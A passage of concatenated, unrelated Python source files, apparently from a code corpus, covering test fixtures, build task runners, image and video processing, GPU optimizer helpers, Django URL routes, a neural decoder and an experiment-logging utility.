= os.path.join(data_dir, 'zurich', 'zurich_subset_lod2.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def zurich_subset_path(data_dir): p = os.path.join(data_dir, 'zurich', 'zurich_subset_lod2.json') yield p @pytest.mark.balazs @pytest.fixture(scope='function') def ms_triangles(data_dir): """Long list of triangulated MultiSurfaces with EPSG:7514 corodinates.""" p = os.path.join(data_dir, 'multisurface_triangulated.pickle') with open(p, 'rb') as fo: yield pickle.load(fo) @pytest.fixture(scope='session') def dummy(data_dir): p = os.path.join(data_dir, 'dummy', 'dummy.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def dummy_noappearance(data_dir): p = os.path.join(data_dir, 'dummy', 'dummy_noappearance.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def cube(data_dir): p = os.path.join(data_dir, 'cube.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def cube_compressed(data_dir): p = os.path.join(data_dir, 'cube.c.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def minimal(data_dir): p = os.path.join(data_dir, 'minimal.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def rectangle(data_dir): p = os.path.join(data_dir, 'dummy', 'rectangle.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def multi_lod(data_dir): p = os.path.join(data_dir, 'multi_lod.json') with open(p, 'r') as f: yield cityjson.CityJSON(file=f) @pytest.fixture(scope='session') def multi_lod_path(data_dir): p = os.path.join(data_dir, 'multi_lod.json') yield p @pytest.fixture(scope='session') def vertices(): yield [ (0.0,1.0,0.0), (1.0,1.0,0.0), (2.0,1.0,0.0), (3.0,1.0,0.0), (4.0,1.0,0.0), (5.0,1.0,0.0) ] @pytest.fixture(scope='session') def materials(data_dir): p1 = os.path.join(data_dir, 'material', 'mt-1.json') p2 = os.path.join(data_dir, 'material', 'mt-2.json') p3 = os.path.join(data_dir, 'dummy', 'composite_solid_with_material.json') p4 = os.path.join(data_dir, 'dummy', 'dummy.json') p5 = os.path.join(data_dir, 'dummy', 'multisurface_with_material.json') cj = [] for p in (p1, p2, p3, p4, p5): with open(p, 'r') as f: cj.append(cityjson.CityJSON(file=f)) return cj @pytest.fixture(scope='session') def triangulated(data_dir): p1 = os.path.join(data_dir, 'material', 'mt-1-triangulated.json') p2 = os.path.join(data_dir, 'material', 'mt-2-triangulated.json') p3 = os.path.join(data_dir, 'dummy', 'dummy-triangulated.json') cj = [] for p in (p1, p2, p3): with open(p, 'r') as f: cj.append(cityjson.CityJSON(file=f)) return cj @pytest.fixture(scope='session') def mt_1_path(data_dir): return os.path.join(data_dir, 'material', 'mt-1.json')
11588828
import sys import traceback if sys.version_info[0] < 3: import Queue as queue else: import queue import threading from yaku.task_manager \ import \ run_task, order_tasks, TaskManager from yaku.utils \ import \ get_exception import yaku.errors def run_tasks(ctx, tasks=None): if tasks is None: tasks = ctx.tasks task_manager = TaskManager(tasks) s = SerialRunner(ctx, task_manager) s.start() s.run() def run_tasks_parallel(ctx, tasks=None, maxjobs=1): if tasks is None: tasks = ctx.tasks task_manager = TaskManager(tasks) r = ParallelRunner(ctx, task_manager, maxjobs) r.start() r.run() class SerialRunner(object): def __init__(self, ctx, task_manager): self.ctx = ctx self.task_manager = task_manager def start(self): # Dummy to give same interface as ParallelRunner pass def run(self): grp = self.task_manager.next_set() while grp: for task in grp: run_task(self.ctx, task) grp = self.task_manager.next_set() class ParallelRunner(object): def __init__(self, ctx, task_manager, maxjobs=1): self.njobs = maxjobs self.task_manager = task_manager self.ctx = ctx self.worker_queue = queue.Queue() self.error_out = queue.Queue() self.failure_lock = threading.Lock() self.stop = False def start(self): def _worker(): # XXX: this whole thing is an hack - find a better way to # notify task execution failure to all worker threads while not self.stop: task = self.worker_queue.get() try: run_task(self.ctx, task) except yaku.errors.TaskRunFailure: e = get_exception() self.failure_lock.acquire() self.stop = True self.failure_lock.release() task.error_msg = e.explain task.error_cmd = e.cmd self.error_out.put(task) except Exception: e = get_exception() exc_type, exc_value, tb = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, tb) self.failure_lock.acquire() self.stop = True self.failure_lock.release() task.error_msg = "".join(lines) task.error_cmd = [] self.error_out.put(task) self.worker_queue.task_done() for i in range(self.njobs): t = threading.Thread(target=_worker) t.setDaemon(True) t.start() def run(self): grp = self.task_manager.next_set() while grp: for task in grp: self.worker_queue.put(task) # XXX: we only join once we detect the worker queue to be empty, to # avoid blocking for a long time. This is naive, and will break if # the worker_queue is filled after this point while not self.stop: if self.worker_queue.empty(): self.worker_queue.join() break if not self.error_out.empty(): task = self.error_out.get() msg = task.error_msg cmd = task.error_cmd raise yaku.errors.TaskRunFailure(cmd, msg) grp = self.task_manager.next_set()
11588845
from functools import partial from typing import Any, Dict import pytest from pydantic import ValidationError from tests.utils.asserts import assert_validation_error from todolist.core.accounts.entities.user import Credentials DataType = Dict[str, Any] @pytest.fixture(name="valid_data") def valid_data_fixture() -> DataType: return { "email": "<EMAIL>", "password": "<PASSWORD>", } @pytest.fixture(name="invalid_data") def invalid_data_fixture() -> DataType: return { "email": "some email", "password_hash": ["<PASSWORD>"], } @pytest.mark.unit class TestCredentials: class TestModel: def test_validation(self, valid_data): assert Credentials(**valid_data) def test_invalidation(self, invalid_data): with pytest.raises(ValidationError): assert Credentials(**invalid_data) def test_immutability(self, valid_data): entity = Credentials(**valid_data) for key in entity.dict().keys(): with pytest.raises(TypeError): setattr(entity, key, "some value") class TestEmail: assert_validation_error = partial(assert_validation_error, 1, "email") def test_must_be_email(self, valid_data): with pytest.raises(ValidationError) as excinfo: valid_data.update({"email": ["some string"]}) Credentials(**valid_data) self.assert_validation_error("type_error.str", excinfo) def test_is_required(self, valid_data): with pytest.raises(ValidationError) as excinfo: valid_data.pop("email") Credentials(**valid_data) self.assert_validation_error("value_error.missing", excinfo) class TestPassword: assert_validation_error = partial(assert_validation_error, 1, "password") def test_must_be_secret_str(self, valid_data): with pytest.raises(ValidationError) as excinfo: valid_data.update({"password": ["<PASSWORD>"]}) Credentials(**valid_data) self.assert_validation_error("type_error.str", excinfo) def test_is_required(self, valid_data): with pytest.raises(ValidationError) as excinfo: valid_data.pop("password") Credentials(**valid_data) self.assert_validation_error("value_error.missing", excinfo) def test_min_length_gte_8(self, valid_data): with pytest.raises(ValidationError) as excinfo: valid_data.update({"password": "a" * 7}) Credentials(**valid_data) self.assert_validation_error("value_error.any_str.min_length", excinfo) def test_max_length_lte_128(self, valid_data): with pytest.raises(ValidationError) as excinfo: valid_data.update({"password": "a" * 129}) Credentials(**valid_data) self.assert_validation_error("value_error.any_str.max_length", excinfo)
11588853
from multiprocessing.reduction import ForkingPickler import quiver def rebuild_feature(ipc_handle): feature = quiver.Feature.lazy_from_ipc_handle(ipc_handle) return feature def reduce_feature(feature): ipc_handle = feature.share_ipc() return (rebuild_feature, (ipc_handle, )) def rebuild_pyg_sampler(cls, ipc_handle): sampler = cls.lazy_from_ipc_handle(ipc_handle) return sampler def reduce_pyg_sampler(sampler): ipc_handle = sampler.share_ipc() return (rebuild_pyg_sampler, ( type(sampler), ipc_handle, )) def init_reductions(): ForkingPickler.register(quiver.Feature, reduce_feature) ForkingPickler.register(quiver.pyg.GraphSageSampler, reduce_pyg_sampler) ForkingPickler.register(quiver.pyg.MixedGraphSageSampler, reduce_pyg_sampler)
11588895
from .._tier0 import execute from .._tier0 import plugin_function from .._tier0 import Image @plugin_function(categories=['filter', 'in assistant']) def maximum_image_and_scalar(source : Image, destination : Image = None, scalar : float = 0): """Computes the maximum of a constant scalar s and each pixel value x in a given image X. <pre>f(x, s) = max(x, s)</pre> Parameters ---------- source : Image destination : Image scalar : Number Returns ------- destination Examples -------- >>> import pyclesperanto_prototype as cle >>> cle.maximum_image_and_scalar(source, destination, scalar) References ---------- .. [1] https://clij.github.io/clij2-docs/reference_maximumImageAndScalar """ parameters = { "src":source, "dst": destination, "valueB":float(scalar) } execute(__file__, '../clij-opencl-kernels/kernels/maximum_image_and_scalar_' + str(len(destination.shape)) + 'd_x.cl', 'maximum_image_and_scalar_' + str(len(destination.shape)) + 'd', destination.shape, parameters) return destination
11588996
import cv2 import numpy as np import os #Read a Video Stream and Display It #Camera Object cam = cv2.VideoCapture(0) face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml') face_data = [] cnt = 0 user_name = input("enter your name") while True: ret,frame = cam.read() if ret==False: print("Something Went Wrong!") continue key_pressed = cv2.waitKey(1)&0xFF #Bitmasking to get last 8 bits if key_pressed==ord('q'): #ord-->ASCII Value(8 bit) break faces = face_cascade.detectMultiScale(frame,1.3,5) #print(faces) if(len(faces)==0): cv2.imshow("Video",frame) continue for face in faces: x,y,w,h = face face_section = frame[y-10:y+h+10,x-10:x+w+10]; face_section = cv2.resize(face_section,(100,100)) cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2) if cnt%10==0: print("Taking picture ",int(cnt/10)) face_data.append(face_section) cnt +=1 gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) cv2.imshow("Video",frame) cv2.imshow("Video Gray",face_section) #Save the face data in a numpy file print("Total Faces" ,len(face_data)) face_data = np.array(face_data) face_data = face_data.reshape((face_data.shape[0],-1)) np.save("FaceData/"+user_name+".npy",face_data) print("Saved at FaceData/"+user_name+".npy") print(face_data.shape) cam.release() cv2.destroyAllWindows()
11589012
from functools import wraps import numpy from theano import scalar as scal, Constant from theano.gof import local_optimizer from theano.tensor import (DimShuffle, get_scalar_constant_value, NotScalarConstantError) from theano.sandbox.cuda.basic_ops import ( GpuFromHost, HostFromGpu, host_from_gpu, GpuDimShuffle, GpuElemwise) _one = scal.constant(numpy.asarray(1.0, dtype='float32')) def grab_cpu_scalar(v, nd): if v.owner is not None: n = v.owner if (isinstance(n.op, GpuDimShuffle) and n.op.new_order == ('x',) * nd): return host_from_gpu(n.inputs[0]) elif (isinstance(n.op, DimShuffle) and n.op.new_order == ('x',) * nd): return n.inputs[0] elif isinstance(n.op, GpuFromHost): return grab_cpu_scalar(n.inputs[0], nd=nd) else: return None else: if (isinstance(v, Constant) and v.broadcastable == (True,) * nd): return v.dimshuffle(()) def find_node(v, cls, ignore_clients=False): # This digs through possibly redundant transfers to for the node # that has the op class specified. if v.owner is not None and (ignore_clients or len(v.clients) == 1): if isinstance(v.owner.op, cls): return v.owner elif (isinstance(v.owner.op, GpuFromHost) and v.owner.inputs[0].owner is not None and (ignore_clients or len(v.owner.inputs[0].clients) == 1) and isinstance(v.owner.inputs[0].owner.op, HostFromGpu)): return find_node(v.owner.inputs[0].owner.inputs[0], cls) else: return None def is_equal(var, val): # Returns True if var is always equal to val (python value), False # otherwise (including if var is not constant) try: v = get_scalar_constant_value(var) return v == val except NotScalarConstantError: return False def alpha_merge(cls, alpha_in, beta_in): def wrapper(maker): @local_optimizer([GpuElemwise]) @wraps(maker) def opt(node): if (isinstance(node.op, GpuElemwise) and node.op.scalar_op == scal.mul and node.nin == 2): targ = find_node(node.inputs[0], cls) if targ is None: targ = find_node(node.inputs[1], cls) if targ is None: return lr = grab_cpu_scalar(node.inputs[0], nd=targ.outputs[0].ndim) else: lr = grab_cpu_scalar(node.inputs[1], nd=targ.outputs[0].ndim) if lr is None or targ is None: return None inputs = list(targ.inputs) try: c = get_scalar_constant_value(lr) if c == 0: inputs[alpha_in] = lr inputs[beta_in] = lr elif c == 1: inputs[alpha_in] = targ.inputs[alpha_in] inputs[beta_in] = targ.inputs[beta_in] else: inputs[alpha_in] = lr * targ.inputs[alpha_in] inputs[beta_in] = lr * targ.inputs[beta_in] except NotScalarConstantError: inputs[alpha_in] = lr * targ.inputs[alpha_in] inputs[beta_in] = lr * targ.inputs[beta_in] return maker(targ, *inputs) return opt return wrapper def output_merge(cls, alpha_in, beta_in, out_in): def wrapper(maker): @local_optimizer([GpuElemwise]) @wraps(maker) def opt(node): if (isinstance(node.op, GpuElemwise) and node.op.scalar_op == scal.add and node.nin == 2): targ = find_node(node.inputs[0], cls) W = node.inputs[1] if targ is None: targ = find_node(node.inputs[1], cls) W = node.inputs[0] if targ is None: return None if not is_equal(targ.inputs[beta_in], 0.0): # other cases are too complex for now return None if W.broadcastable != targ.inputs[out_in].broadcastable: # May change later to do the broadcast, but it's # under discussion. return None inputs = list(targ.inputs) inputs[out_in] = W inputs[beta_in] = _one.clone() return maker(targ, *inputs) return opt return wrapper
11589017
import cv2 import numpy as np import os from tqdm import tqdm from skimage.measure import compare_ssim as ssim import pytorch_ssim import torch from torch.autograd import Variable ''' This util file is for anything related to video processing that can be factored out into here ''' def get_frames_clusters_from_video(video_path, cluster_size=425): ''' Given a video path, read the video, store every cluster_size frames in an array add it a list and return it. ''' # Playing video from file: frameClustersArray = [] cluster = [] cap = cv2.VideoCapture(video_path) while(True): # Capture frame-by-frame ret, frame = cap.read() # Break if no image is returned (have reached end of video) if frame is None or ret is False: break # Add frame to array cluster.append(frame) # If cluster is cluster size break it off if len(cluster) == cluster_size: frameClustersArray.append(list(cluster)) cluster.clear() # Append any residual frames if len(cluster) > 0: frameClustersArray.append(list(cluster)) cluster.clear() # When everything done, release the capture cap.release() cv2.destroyAllWindows() return frameClustersArray def export_video_frames(frames, output_path): ''' Given an array of frames extracted from a video, write these frames to an output directory. ''' if output_path != None: try: if not os.path.exists(output_path): os.makedirs(output_path) except OSError: print ('Error: Creating directory of' + output_path) print ('Writing frames to ' + output_path) currentFrame = 0 for frame in tqdm(frames): # Saves image of the current frame in jpg file name = output_path + 'frame' + str(currentFrame) + '.jpg' # Write frame to directory cv2.imwrite(name, frame) # To stop duplicate images currentFrame += 1 print ("Done!") def group_semantic_frames(frames, threshold=None): ''' Given an array of frames extracted from a video, break these into subarrays of semantically similiar frames. For now use the Structural Similarity Index and once it reaches a certain threshold break off. Return an array of these sub arrays. ''' frame_clusters = [] group = [] print("Grouping semantic frames") for frame in tqdm(frames): if len(group) == 0: group.append(frame) else: # compute structural similarity index between current image and oldest image in the frame group s = 0.0 if torch.cuda.is_available(): threshold = .28 img1 = torch.from_numpy(np.rollaxis(group[0], 2)).float().unsqueeze(0)/255.0 img2 = torch.from_numpy(np.rollaxis(frame, 2)).float().unsqueeze(0)/255.0 img1 = img1.cuda() img2 = img2.cuda() img1 = Variable( img1, requires_grad=False) img2 = Variable( img2, requires_grad = True) s = pytorch_ssim.ssim(img1, img2) s = s.cpu().data.numpy() else: threshold = 0.35 s = ssim(group[0], frame, multichannel=True) if s < threshold: frame_clusters.append(list(group)) group.clear() # TODO: If we don't append the frame each time we only get the salient images which reduces number of frames group.append(frame) if len(group) > 0: frame_clusters.append(list(group)) return frame_clusters
11589041
def prime(num): if num > 1: for i in range(2, int(num/2)+1): if (num % i) == 0: break else: return True else: return False n=int(input("Enter Number:")) p=n s=0 x=prime(n) if x==True: s+=1 rev = 0 while n>0: a = n % 10 rev = rev * 10 + a n = n // 10 y=prime(rev) if y==True: s+=1 if s==2: print(p, " is Emirp Number") else: print(p, " is not Emirp Number")
11589055
import numpy as np import unittest import spikeextractors as se class TestNumpyExtractors(unittest.TestCase): def setUp(self): M = 4 N = 10000 N_ttl = 50 seed = 0 sampling_frequency = 30000 X = np.random.RandomState(seed=seed).normal(0, 1, (M, N)) geom = np.random.RandomState(seed=seed).normal(0, 1, (M, 2)) self._X = X self._geom = geom self._sampling_frequency = sampling_frequency self.RX = se.NumpyRecordingExtractor(timeseries=X, sampling_frequency=sampling_frequency, geom=geom) self._ttl_frames = np.sort(np.random.permutation(N)[:N_ttl]) self.RX.set_ttls(self._ttl_frames) self.SX = se.NumpySortingExtractor() L = 200 self._train1 = np.rint(np.random.RandomState(seed=seed).uniform(0, N, L)).astype(int) self.SX.add_unit(unit_id=1, times=self._train1) self.SX.add_unit(unit_id=2, times=np.random.RandomState(seed=seed).uniform(0, N, L)) self.SX.add_unit(unit_id=3, times=np.random.RandomState(seed=seed).uniform(0, N, L)) def tearDown(self): pass def test_recording_extractor(self): # get_channel_ids self.assertEqual(self.RX.get_channel_ids(), [i for i in range(self._X.shape[0])]) # get_num_channels self.assertEqual(self.RX.get_num_channels(), self._X.shape[0]) # get_num_frames self.assertEqual(self.RX.get_num_frames(), self._X.shape[1]) # get_sampling_frequency self.assertEqual(self.RX.get_sampling_frequency(), self._sampling_frequency) # get_traces self.assertTrue(np.allclose(self.RX.get_traces(), self._X)) self.assertTrue( np.allclose(self.RX.get_traces(channel_ids=[0, 3], start_frame=0, end_frame=12), self._X[[0, 3], 0:12])) # get_channel_property - location self.assertTrue(np.allclose(np.array(self.RX.get_channel_locations(1)), self._geom[1, :])) # time_to_frame / frame_to_time self.assertEqual(self.RX.time_to_frame(12), 12 * self.RX.get_sampling_frequency()) self.assertEqual(self.RX.frame_to_time(12), 12 / self.RX.get_sampling_frequency()) # get_snippets snippets = self.RX.get_snippets(reference_frames=[0, 30, 50], snippet_len=20) self.assertTrue(np.allclose(snippets[1], self._X[:, 20:40])) # get_ttl_events self.assertTrue(np.array_equal(self.RX.get_ttl_events()[0], self._ttl_frames)) def test_sorting_extractor(self): unit_ids = [1, 2, 3] # get_unit_ids self.assertEqual(self.SX.get_unit_ids(), unit_ids) # get_unit_spike_train st = self.SX.get_unit_spike_train(unit_id=1) self.assertTrue(np.allclose(st, self._train1)) if __name__ == '__main__': unittest.main()
11589063
from tests.unit import base from src import config as config_module config = config_module.get_config() class CreateApiTest(base.TestCase): @base.mock.patch('src.api.create_api') @base.mock.patch('src.initialize.web_app') def test_should_call_api_to_create_api(self, web_app_mock, create_api_mock): base.initialize.create_api() create_api_mock.assert_called_with(web_app_mock) class RunTest(base.TestCase): @base.mock.patch('src.initialize.web_app') @base.mock.patch('src.initialize.create_api') def test_should_call_web_app_to_run(self, create_api_mock, web_app_mock): base.initialize.run() web_app_mock.run.assert_called_with(host='0.0.0.0', port=int(config.PORT), debug=True, threaded=True)
11589088
from kornia.geometry.bbox import * from kornia.geometry.calibration import * from kornia.geometry.camera import * from kornia.geometry.conversions import * from kornia.geometry.depth import * from kornia.geometry.epipolar import * from kornia.geometry.homography import * from kornia.geometry.linalg import * from kornia.geometry.ransac import * from kornia.geometry.subpix import * from kornia.geometry.transform import *
11589090
r""" Advanced example ================== Let's present how one can specify different aspects of the problem formulation and model selection strategy on classo, using synthetic data. """ # %% # Import the package # ^^^^^^^^^^^^^^^^^^^^ import sys, os from os.path import join, dirname, abspath classo_dir = dirname(dirname(abspath("__file__"))) sys.path.append(classo_dir) from classo import classo_problem, random_data import numpy as np # %% # Generate the data # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # This code snippet generates a problem instance with sparse ß in dimension # d=100 (sparsity d_nonzero=5). The design matrix X comprises n=100 samples generated from an i.i.d standard normal # distribution. The dimension of the constraint matrix C is d x k matrix. The noise level is σ=0.5. # The input `zerosum=True` implies that C is the all-ones vector and Cß=0. The n-dimensional outcome vector y # and the regression vector ß is then generated to satisfy the given constraints. # One can then see the parameters that should be selected. m, d, d_nonzero, k, sigma = 100, 200, 5, 1, 0.5 (X, C, y), sol = random_data( m, d, d_nonzero, k, sigma, zerosum=True, seed=1, intercept=1.0 ) # %% # Create labels # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # This code snoppet creates labels that indicate where the solution ß should be nonzero. labels = np.empty(d, dtype=str) for i in range(d): if sol[i] == 0.0: labels[i] = "no_" + str(i) else: labels[i] = "yes_" + str(i) # %% # Define the classo instance # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # Next we can define a default c-lasso problem instance with the generated data: problem = classo_problem(X, y, C) # %% # Change the parameters # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # Let's see some example of change in the parameters problem.formulation.huber = True problem.formulation.concomitant = False problem.formulation.intercept = True problem.model_selection.CV = True problem.model_selection.LAMfixed = True problem.model_selection.StabSelparameters.method = "max" problem.model_selection.CVparameters.seed = 1 problem.model_selection.LAMfixedparameters.rescaled_lam = True problem.model_selection.LAMfixedparameters.lam = 0.1 # %% # Check parameters # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # You can look at the generated problem instance by typing: print(problem) # %% # Solve optimization problems # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # We use stability selection as default model selection strategy. # The command also allows you to inspect the computed stability profile for all variables # at the theoretical λ. # Two other model selections are computed here: # computation of the solution for a fixed lambda; # a path computation followed by a computation of the Approximation of the Leave-one Out error (ALO); # a k-fold cross-validation. problem.solve() # %% # Visualisation # ^^^^^^^^^^^^^^^ # # After completion, the results of the optimization and model selection routines # can be visualized using print(problem.solution) # %% # R1 formulation with ALO # ^^^^^^^^^^^^^^^^^^^^^^^^^^ # problem.data.label = labels problem.formulation.intercept = False problem.formulation.huber = False problem.model_selection.ALO = True problem.model_selection.CV = False problem.model_selection.LAMfixed = False problem.solve() print(problem) print(problem.solution)
11589095
import pytest PRIVATE_KEY = "private_key" PRIVATE_VALUE = "private_vale" PUBLIC_KEY = "key" PUBLIC_VALUE = "value" @pytest.fixture def payment_with_public_metadata(payment): payment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE}) payment.save(update_fields=["metadata"]) return payment @pytest.fixture def payment_with_private_metadata(payment): payment.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE}) payment.save(update_fields=["private_metadata"]) return payment
11589117
from django.conf.urls.defaults import patterns, url # base urls urlpatterns = patterns( 'popcorn_gallery.popcorn.views.projects', url(r'^projects/$', 'project_list', name='project_list'), url(r'^projects/category/(?P<slug>[\w-]+)/$', 'project_list', name='project_list_category'), url(r'^projects/category/(?P<slug>[\w-]+)/$', 'project_list', name='project_list_category'), url(r'^projects/category/(?P<slug>[\w-]+)/join/$', 'project_category_join', name='project_category_join'), ) template_pattern = '(?P<username>[-\w]+)/(?P<slug>[-\w]+)' # templates urls urlpatterns += patterns( 'popcorn_gallery.popcorn.views.projects', url(r'^templates/$', 'template_list', name='template_list'), url(r'^templates/category/(?P<slug>[\w-]+)/$', 'template_list', name='template_list_category'), url(r'^template/(?P<slug>[\w-]+)/$', 'template_detail', name='template_detail'), url(r'^template/(?P<slug>[\w-]+)/config$', 'template_config', name='template_config'), url(r'^template/(?P<slug>[\w-]+)/data$', 'template_metadata', name='template_metadata'), url(r'^template/(?P<slug>[\w-]+)/summary/$', 'template_summary', name='template_summary'), ) project_pattern = '(?P<username>[-\w]+)/(?P<shortcode>[-\w]+)' # user_project urls urlpatterns += patterns( 'popcorn_gallery.popcorn.views.projects', url(r'^%s/$' % project_pattern, 'user_project', name='user_project'), url(r'^%s/edit/$' % project_pattern, 'user_project_butter', name='user_project_butter'), url(r'^%s/config$' % project_pattern, 'user_project_config', name='user_project_config'), url(r'^%s/edit/config$' % project_pattern, 'user_project_config'), url(r'^%s/options/$' % project_pattern, 'user_project_edit', name='user_project_edit'), url(r'^%s/meta/$' % project_pattern, 'user_project_meta', name='user_project_meta'), url(r'^%s/data$' % project_pattern, 'user_project_data', name='user_project_data'), url(r'^%s/edit/data$' % project_pattern, 'user_project_data'), url(r'^%s/delete/$' % project_pattern, 'user_project_delete', name='user_project_delete'), url(r'^%s/fork/$' % project_pattern, 'user_project_fork', name='user_project_fork'), url(r'^%s/summary/$' % project_pattern, 'user_project_summary', name='user_project_summary'), )
11589122
import torch import torch.nn as nn import torch.nn.functional as F from lib.layers import ( ResnetBlockFC, CResnetBlockConv1d, CBatchNorm1d, CBatchNorm1d_legacy, ) class DecoderCBatchNorm(nn.Module): ''' Decoder class with CBN for ONet 4D. Args: z_dim (int): dimension of latent code z c_dim (int): dimension of latent conditioned temporal code c dim (int): points dimension hidden_size (int): hidden dimension leaky (bool): whether to use leaky activation legacy (bool): whether to use legacy version ''' def __init__(self, dim=3, c_dim=128, hidden_size=256, leaky=False, legacy=False): super().__init__() self.dim = dim self.fc_p = nn.Conv1d(dim, hidden_size, 1) self.block0 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy) self.block1 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy) self.block2 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy) self.block3 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy) self.block4 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy) if not legacy: self.bn = CBatchNorm1d(c_dim, hidden_size) else: self.bn = CBatchNorm1d_legacy(c_dim, hidden_size) self.fc_out = nn.Conv1d(hidden_size, 1, 1) if not leaky: self.actvn = F.relu else: self.actvn = lambda x: F.leaky_relu(x, 0.2) # For ONet 4D def add_time_axis(self, p, t): ''' Adds time axis to points. Args: p (tensor): points t (tensor): time values ''' n_pts = p.shape[1] t = t.unsqueeze(1).repeat(1, n_pts, 1) p_out = torch.cat([p, t], dim=-1) return p_out def forward(self, p, c, **kwargs): ''' Performs a forward pass through the model. Args: p (tensor): points tensor z (tensor): latent code z c (tensor): latent conditioned temporal code c ''' # if p.shape[-1] != self.dim: # p = self.add_time_axis(p, kwargs['t']) p = p.transpose(1, 2) batch_size, D, T = p.size() net = self.fc_p(p) net = self.block0(net, c) net = self.block1(net, c) net = self.block2(net, c) net = self.block3(net, c) net = self.block4(net, c) out = self.fc_out(self.actvn(self.bn(net, c))) out = out.squeeze(1) return out
11589184
import datetime from distutils import dir_util import os import pandas as pd import shutil import warnings def copytree(src, dst, symlinks=False, ignore=None): ''' Function to copy directories. ''' if not os.path.exists(dst): os.makedirs(dst) for item in os.listdir(src): s = os.path.join(src, item) d = os.path.join(dst, item) if os.path.isdir(s): shutil.copytree(s, d, symlinks, ignore) else: shutil.copy2(s, d) def save(files, experiment_name='', params={}, scores={}, other={}, comments='', update_html_flag=False, working_dir='', kinoa_dir_name='__kinoa__', use_spaces=False, sort_log_by='experiment_datetime', sort_log_ascending=True, columns_order=[]): ''' Function to save experiment. Inputs: - files (list of str) - List of files and directories to save. - experiment_name (str) - String with name of an experiment. If empty - date and time used to define the name in a format %Y-%m-%d_%H-%M-%S. - params (dict) - Dictionary with parameters of experiment. - scores (dict) - Dictionary with evaluation results. - other (dict) - Dictionary with other data needed in log. - comments (str) - String with comments to the experiment. - working_dir (str) - Path to the directory, where log of experiments will be stored. kinoa_dir_name directory will be created within working_dir. - kinoa_dir_name (str) - Name of the directory, where logs will be stored. - use_spaces (bool) - Flag if spaces should be used in a directory name for current experiment. - sort_log_by (str or list of str) - Specify which columns to use to sort rows in the log file. - sort_log_ascending (bool or list of bool) - Sort ascending vs. descending. Specify list for multiple sort orders. If this is a list of bools, must match the length of the sort_log_by. - columns_order (list of str or dict in format ('col_name': index)) - Specify order of columns in the log file. Columns that are not present in columns_order will remain in the file, but after specified columns. ''' # Get date time of experiment log now = datetime.datetime.now() experiment_datetime = str(now.strftime('%Y-%m-%d_%H-%M-%S')) if len(experiment_name) == 0: experiment_name = experiment_datetime # Define delimiter for new directories if use_spaces: delimiter = ' ' else: delimiter = '_' experiment_name = experiment_name.replace(' ', delimiter) # Define directory name for current experiment if len(working_dir) == 0: if experiment_name == experiment_datetime: working_dir = os.path.join(kinoa_dir_name, experiment_datetime) else: working_dir = os.path.join(kinoa_dir_name, experiment_datetime + delimiter + experiment_name) else: if experiment_name == experiment_datetime: working_dir = os.path.join(working_dir, kinoa_dir_name, experiment_datetime) else: working_dir = os.path.join(working_dir, kinoa_dir_name, experiment_datetime + delimiter + experiment_name) if not os.path.exists(working_dir): os.makedirs(working_dir) # Copy files and directories if isinstance(files, list): for file in files: # print(file) if os.path.isdir(file): copytree(file, os.path.join(working_dir, file)) else: file_dir = os.path.dirname(file) if len(file_dir) > 0: if not os.path.exists(os.path.join(working_dir, file_dir)): os.makedirs(os.path.join(working_dir, file_dir)) shutil.copy2(file, os.path.join(working_dir, file)) # Prepare experiment description experiment_dict = { 'experiment_name': experiment_name, 'experiment_datetime': experiment_datetime, 'comments': comments } header_cols = ['experiment_datetime', 'experiment_name', 'comments'] # Update dictionaries params_cols = [] for k in params.keys(): col_name = 'params.' + str(k) experiment_dict[col_name] = params[k] params_cols.append(col_name) scores_cols = [] for k in scores.keys(): col_name = 'scores.' + str(k) experiment_dict['scores.' + str(k)] = scores[k] scores_cols.append(col_name) other_cols = [] for k in other.keys(): col_name = 'other.' + str(k) experiment_dict['other.' + str(k)] = other[k] other_cols.append(col_name) # Append experiment to experiments log log_fname = os.path.join(kinoa_dir_name, 'log.csv') if os.path.isfile(log_fname): log_df = pd.read_csv(log_fname) existing_cols = log_df.columns else: log_df = pd.DataFrame() existing_cols = [] # Update columns order in csv file params_cols = sorted(list(set(params_cols + [c for c in existing_cols if 'params.' in c ]))) scores_cols = sorted(list(set(scores_cols + [c for c in existing_cols if 'scores.' in c]))) other_cols = sorted(list(set(other_cols + [c for c in existing_cols if 'other.' in c]))) cols_order = header_cols + params_cols + other_cols # Check for unknown columns unknown_cols = [] for c in existing_cols: if c not in cols_order and c not in scores_cols: unknown_cols.append(c) cols_order += unknown_cols + scores_cols # Append new experiment to log log_df = log_df.append(pd.Series(experiment_dict), ignore_index=True) # Sort rows in log table if sort_log_by not in log_df.columns: warnings.warn(str(sort_log_by) + ' column was not found. Using experiment_datetime ' + 'instead.') sort_log_by = experiment_datetime # Reorder columns using user-defined list if len(columns_order) > 0: if isinstance(columns_order, list): keys = list(columns_order.keys()) for c in keys: if c in cols_order: cols_order.remove(c) else: warnings.warn(str(c) + ' column was not found in log. Skipped.') columns_order.remove(c) cols_order = columns_order + cols_order elif isinstance(columns_order, dict): n_cols = len(cols_order) keys = list(columns_order.keys()) for c in keys: if c in cols_order: cols_order.remove(c) else: warnings.warn(str(c) + ' 